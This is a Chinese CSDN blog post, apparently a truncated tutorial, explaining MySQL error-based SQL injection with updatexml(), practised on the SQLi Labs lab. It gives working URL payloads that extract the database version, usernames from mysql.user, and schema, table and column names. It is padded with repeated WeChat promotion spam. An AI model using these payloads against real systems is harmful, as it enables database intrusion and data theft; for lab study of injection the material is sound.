报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例(1)

于 2024-04-20 17:19:27 发布
阅读量348 收藏 9
点赞数 5
分类专栏: 2024年程序员学习 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83946261/article/details/138004816
版权

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

在这里插入图片描述

提示:0x7e 等价于 ~

参数2包含特殊符号 ~,触发数据库报错,并将参数2的内容显示在报错信息中。

3. 拼接查询结果

如果我们在参数2的位置,将查询语句和特殊符号拼接在一起,就可以将查询结果显示在报错信息中,在地址栏中输入:

?id=1' and updatexml(1, concat(0x7e,version()), 3) -- a

在这里插入图片描述
参数2内容中的查询结果显示在数据库的报错信息中,并回显到页面。

提示:

  1. version():返回数据库版本
  2. concat():拼接特殊符号和查询结果,函数使用方式可以参考我的另一篇博客:MySQL concat函数使用详解

4. 长度限制

updatexml() 函数的报错内容长度不能超过32个字符,常用的解决方式有两种:

  1. limit 分页
  2. substr()截取字符
4.1 limit 分页

以查询数据库用户为例:

?id=-1' and updatexml(1,concat(0x7e,
	(select user
	from mysql.user limit 1,1)
),3) -- a

在这里插入图片描述

4.2 substr()截取字符

以查询数据库用户为例:

?id=-1' and updatexml(1,concat(0x7e,
	substr(
		(select group_concat(user)
		from mysql.user)
	, 1 , 31)
),3) -- a

在这里插入图片描述
理解报错注入的执行原理后,我们整理一下报错注入的步骤。

三、步骤总结

适用情况:页面有数据库的报错信息

报错信息必须是动态的、来自数据库的报错信息。
网站写死的、自定义的报错提示不算。

1. 判断是否报错

参数中添加单/双引号,页面报错才可进行下一步。

?id=1' -- a

2. 判断报错条件

参数中添加报错函数,检查报错信息是否正常回显

?id=1' and updatexml(1,'~',3) -- a

3. 脱库

获取所有数据库

?id=-1' and updatexml(1,concat('~',
	substr( 
		(select group_concat(schema_name)
		from information_schema.schemata)
	, 1 , 31)
),3) -- a

获取所有表

?id=1' and updatexml(1,concat('~',
 substr( 
 (select group\_concat(table\_name)
 from information\_schema.tables
 where table\_schema = 'security')
	, 1 , 31)
),3) -- a

获取所有字段

?id=1' and updatexml(1,concat('~',
 substr( 
 (select group\_concat(column\_name)
 from information\_schema.columns
 where table\_schema = 'security' and table\_name = 'users')
	, 1 , 31)
),3) -- a

四、实战案例

我们拿上面的测试网站(SQLi Labs 第一关)来举例,添加单引号查看是否报错,地址栏输入 ?id=1'
在这里插入图片描述
页面出现数据库的报错信息,适合使用报错注入,接下来,获取数据库用户的密码,地址栏输入:



**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
![img](https://img-blog.csdnimg.cn/img_convert/45a83e121a1599e674132442db8ee44d.png)

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
[外链图片转存中...(img-tRkzZ2LR-1713604756622)]

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_83946261
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全:SQL注入注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 2196
这篇文章为大家解析注入的实现原理,结合实战案例讲解注入的使用步骤
web-注入-皮卡丘靶场
07-15
皮卡丘靶场的几种注入
注入是什么?一看你就明白了。注入原理+步骤+实战案例
wangyuxiang946的博客
03-12 2万+
注入怎么使用,注入步骤注入原理注入使用。
sql注入(6)注入
c10udz的博客
05-11 4824
【web安全】——注入
Demo不是emo的博客
01-07 1万+
SQL注入注入
sql注入——注入
最新发布
m0_73756016的博客
10-18 1214
注入是什么 什么是注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()注入 2.通过extractValue()注入 3.通过updateXml()注入 4.通过NAME_CONST()
深入浅出带你学习注入
Spontaneous_0的博客
02-19 374
深入浅出带你学习注入
MYSQL updatexml()函数注入解析
09-09
主要介绍了MYSQL updatexml()函数注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
035-关于floor()注入,你真的懂了吗?.pdf
09-20
035-关于floor()注入,你真的懂了吗?.pdf
MySQL五种注入1
08-04
MySQL五种注入/*数据库版本*//*简单办法暴库*//*连接用户*//*连接数据库*//*暴库*//*暴表*//*暴字段*//*暴内容*/2、Extra
SQL注入-注入
LJH1999ZN的博客
02-09 9682
sql注入注入的演示与介绍
注入
qq_39298901的博客
02-17 661
一、简介 ​ 注入有12种,分别是:floor、ExtractValue、UpdateXml、NAME_CONST、join、exp、GeometryCollection、polygon、multipoint、multlinestring、multpolygon、linestring。本文将探究基于floor的sql注入,介绍其原理及利用方法。 二、相关函数 ​ 在讲原理之前我们需要先了解一下相关sql语句以及几个sql函数的知识,然后对才能对原理理.
注入原理分析
m0_38103658的博客
08-30 5038
注入原理分析 SQL注入就是利用数据库的某些机制,人为地制造误条件,使得查询结果能够出现在误信息中。这种手段在联合查询受限且能返回误信息的情况下比较好用。 使用注入的前提: 页面上没有显示位但是有sql语句执行误信息输出位。 使用mysql_error()函数,可以返回上一个Mysql操作产生的文本误信息。 MYSQL注入的分类: BIGINT等数据类型溢出 xpat...
注入详解
weixin_45253622的博客
03-19 1万+
注入 注入是SQL注入的一种。 利用前提:页面上没有显示位,但是需要输出SQL语句执行误信息。比如mysql_error() 优点:不需要显示位 缺点:需要输出mysql_error()的信息 函数 1、floor注入 floor()注入是利用count()、rand()、floor()、group by 这几个特定的函数结合在一起产生的注入漏洞,准确的说是floor,count,group by冲突原理:利用数据库表主键不能重复的原理,使用GROUP BY分组,产生主
sql注入注入
热门推荐
silence1_的博客
06-04 3万+
注入 注入在没法用union联合查询时用,但前提还是不能过滤一些关键的函数。 注入就是利用了数据库的某些机制,人为地制造误条件,使得查询结果能够出现在误信息中。这里主要记录一下xpath语法误和concat+rand()+group_by()导致主键重复 xpath语法误 利用xpath语法误来进行注入主要利用extractvalue和updatexml两个函数。 使用...
sql注入注入原理解析
一个安全研究员
05-25 1万+
sql注入注入原理详解 前言 我相信很多小伙伴在玩sql注入注入时都会有一个疑问,为什么这么写就会?曾经我去查询的时候,也没有找到满意的答案,时隔几个月终于找到搞清楚原理,特此记录,也希望后来的小伙伴能够少走弯路 0x01 我们先来看一看现象,我这里有一个users表,里面有五条数据: 然后用我们的语句查询一下: select count(*...
最详细的SQL注入注入
qq_62539372的博客
06-23 1万+
最详细的sql注入注入,非常适合小白!!
python程序执行时文件名含中文就,是什么原理
02-06
当 Python 程序执行时,文件名含有中文时会,这是因为 Python 在处理文件名时使用的是默认的 ASCII 编码,而 ASCII 编码只能表示英文字符,无法表示中文字符。所以,当 Python 程序尝试打开一个文件名含有中文的文件时,它会将中文字符解码成 ASCII 编码,而 ASCII 编码中没有对应的字符,就会出现误。 可以使用 Python 的内置函数 `open()` 来打开文件,但是需要指定文件名的编码方式。例如,如果文件名是用 UTF-8 编码的,可以这样打开文件: ```python with open('文件名.txt', 'r', encoding='utf-8') as f: # 读取文件内容 ``` 这样就可以正常打开文件名含有中文的文件了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值